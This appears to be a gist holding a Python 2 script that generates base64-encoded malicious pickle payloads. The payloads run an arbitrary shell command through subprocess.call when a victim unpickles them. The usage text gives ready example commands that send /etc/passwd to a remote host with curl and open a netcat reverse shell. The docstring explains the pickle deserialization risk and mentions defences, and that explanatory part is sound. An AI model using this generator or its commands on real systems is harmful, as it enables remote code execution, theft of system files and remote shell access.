Created
July 31, 2018 05:28
i don't know how to paste with newlines from windows to the linux subsystem, so here we are. im gonna curl it to my own machine
#!/usr/bin/env python | |
from __future__ import print_function | |
import codecs | |
import pickle | |
import subprocess | |
def exploit(cmd):
    """Return an object whose pickled form runs ``cmd`` in a shell on load.

    The returned instance defines ``__reduce__``, which pickle consults to
    learn how to rebuild the object. It answers with ``subprocess.call`` and
    an argument tuple, so the command runs in whatever process unpickles the
    bytes, not in the process that calls ``pickle.dumps``.

    This is the reason ``pickle.loads`` must never be given data from an
    untrusted source: the stream itself chooses the callable that is invoked.
    Use a data-only format such as JSON for untrusted input, or verify a MAC
    over the blob before unpickling. A suspect blob can be inspected without
    executing it using ``pickletools.dis``, which shows the referenced module
    and callable names.

    Args:
        cmd: Shell expression, passed to ``subprocess.call`` as one string.

    Returns:
        An ``Exploit`` instance suitable for ``pickle.dumps``.
    """
    # __reduce__ can only supply positional arguments, so every parameter
    # ahead of ``shell`` is filled in explicitly, in subprocess.Popen order:
    # args, bufsize, executable, stdin, stdout, stderr, preexec_fn,
    # close_fds, shell. shell=True lets cmd stay a single string.
    call_args = (cmd, 0, None, None, None, None, None, False, True)

    class Exploit(object):
        def __reduce__(self):
            return (subprocess.call, call_args)

    return Exploit()
# Help text written to stderr when the script is not given exactly one
# argument; each {} placeholder is filled with this script's path (__file__).
USAGE = '''
Usage: {} CMD
CMD is a shell expression
Examples:
python {} 'curl -sF "file=@/etc/passwd" example.com/exfil'
python {} 'rm /tmp/a;mkfifo /tmp/a;/bin/sh -i </tmp/a 2>&1|nc example.com 4444 >/tmp/a'
'''.format(__file__, __file__, __file__)
if __name__ == '__main__':
    import sys

    # Exactly one argument is expected: the shell expression to embed.
    if len(sys.argv) != 2:
        sys.stderr.write(USAGE)
        sys.exit(1)

    cmd = sys.argv[1]
    pickled = pickle.dumps(exploit(cmd))

    # The base64 codec inserts line breaks into its output; they are removed
    # so the encoded pickle prints as a single line.
    # NOTE: as written this is Python 2 only. Under Python 3 the codec
    # returns bytes and splitting on the str '\n' raises TypeError.
    encoded = codecs.encode(pickled, 'base64')
    payload = ''.join(encoded.split('\n')).strip()
    print(payload)